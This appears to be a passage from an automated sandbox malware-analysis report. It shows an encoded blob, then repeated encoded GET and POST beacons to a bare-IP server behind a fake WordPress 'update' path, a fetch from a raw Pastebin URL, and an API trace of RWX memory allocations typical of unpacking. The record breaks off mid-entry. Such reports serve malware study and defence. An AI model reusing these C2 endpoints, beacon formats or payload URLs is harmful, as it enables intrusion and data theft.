NGUKl2TplEWalnVIRmaG1mWxUzVZ5kUtNGa50WW5Z1RhBTOXRVa3lWS0kTbRNnRXRGMKhVYXpUaPlWVXJGa1UkW5ZkMilmSYp1bSNjYOp0QMlWRqNGb4dkY2pESkVXOyEldWdkWwpFbJZTSDplSWJTWwpFWaVkVGVFSKNETpVEMM9kSp9UaVdEZopkRhpnVtNWbW1WV0Y0VUZlQxIVa3lWSClTaUl2bqlUd5cVYwIEWhlnTyMGbSVlWrlzVUZnVHpFcaZlVRR2aJNXSTFld0sWS2k0UllXOXJGbxAjYsJ1VhdlVGVFSKNETpVEMM9kSp9UaJNjY65EWapWOtNWU5clWrxWbWZlQxIVa3lWSxkUaPlWVtNWMSNTWsJFWh9mTtNmQ5clWrxWbWZlQxIVa3lWS5Z1RkdnRHplQCl3Yqx2RhdnRtNGSCNVUIplRJtmSYl1a1cVWw4EbJZTSTpFdG1GVWJUMSl2dplkQ5kGVp9maJtGbrNmdONzYs5kMilnQWZVUOtWSzl0QNZlQxEVavpWSrxWVapGbtRGbSVlVR50aJNXQq9Ua0IjYw5EWhJjVtVlVCFTUpdXaJZDaVR1ZnRUT0kkaJZTSDpFbWd0YURnMZZHeyEFM1clW5pEWkRkVGVFRKNETpVEMM9kSp9UaRdlWsJ0MVJnTyI2cOVkYoVTbjxmUIVmRWZUVEp0QMlWSVFGTCNUTp9maJxGcYFGVWdUYqZkMRp3dVZVUOtWSzl0URZHNrlkNJNlW2wmMVxGaykFaOtWTNZlRVRkSDxUarpWS2k0UalnVIRmaWdEZwhmMZlnRVZVUOtWSzlkaPlWTuNmdONzYs5kMilnQGJGaOdVYulzRUZlQxEVa3lWT2kUejxmSzIGRWZUVEp0QMlWQU10Zj1mYwJESjxmUzU1ZnRlT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXNVavpWS1lzVhBjQYFWeOJzYsJVVWFlTrl0cJlWZJRWRNRDNp10ZBVUSWJUMRdWQE1EMnRFTxs2RJBHMFZ1bV12Y25URJBXSGt0cWdEZ1x2aJZTSTpFdG1GVWJUMRl2dplUM0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiI5IWM3ADN4ITOxYWOmJzN2cTOjdTNzQGNmNzYzkTYlJ2YmNjZkVDZzIiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W
request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nIiRWNiVGZmBjY3MTM3E2NwEmZmJ2Y5ImNkNDM1U2NzgTN1M2M1UTYxIiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W
request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&989f9bfdbcf48eb9c6ec71e7025d32af=0VfiIiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiImRWYjhzMkBDMyEzM0YjMyMGZjNjMhBjN5UDNxATO5YTZlhzNmZmYkJiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W
request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&8f099c46b18199a489f2d28eafb098db=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
request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&6967395b662dd465398b11d85162f0d3=d1nIzMmY5UDOzQmY4cTNxMTZyUmYjVWNmNzMwUTOhhjZzcjN0IzN0ADO4IiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W&989f9bfdbcf48eb9c6ec71e7025d32af=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
request GET http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY&989f9bfdbcf48eb9c6ec71e7025d32af=QX9JSUNJiOiIzMwMGNkFDN5IjNjNGNzQTYyYmZjlTN2IWMyEmZxgTOiwiIiRWNiVGZmBjY3MTM3E2NwEmZmJ2Y5ImNkNDM1U2NzgTN1M2M1UTYxIiOikTOzQGO3QzM0gDM4YWMkZzNzEGMiRWZmVGMkRzMkhDZiwiIjRDO1IjZwgTZhlzMjJmZxgjYwIjZjdjNkRWOklDMlFWZllzYlZGNxIiOigTYzczN1ImZwADNxUDZ4EjY4E2N0I2MihDZjVWY3UGMis3W
request POST http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY
request GET https://pastebin.com/raw/dkXAJ0Ef
request POST http://5.161.143.111/Linuximage/Multi3/Default/multi/Eternal/WordpressUniversal/SecureLowbasewordpress/sql4http8/wordpress/PrivateAsync1cpu/php/UpdateRequestPrivate0/externalpythonPhpUpdates.php?zd6j65aNjuVpR2dlLFVTgimdEO6=YyfjnbjzFmbPFeceXRnVmMkDT&SQ0=fr9nyvPwBzSofinF&30126795304c4b35e576547908d90d67=jJmYkZTZxImYjR2NkRjZhNGO0ImYwMjZmRmY3U2NwkjNxYWZ4UTY3MjM4QDN0cTM0YDOzMjM&9a96373b97fc1a2b0de79e211da21f57=wYmVDNkljZzQzMwEmNzkjY5gTZ0QTOjBjZjVmNjNTM0UTYzUTNxETY
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 912
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00510000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00800000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02360000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00785000
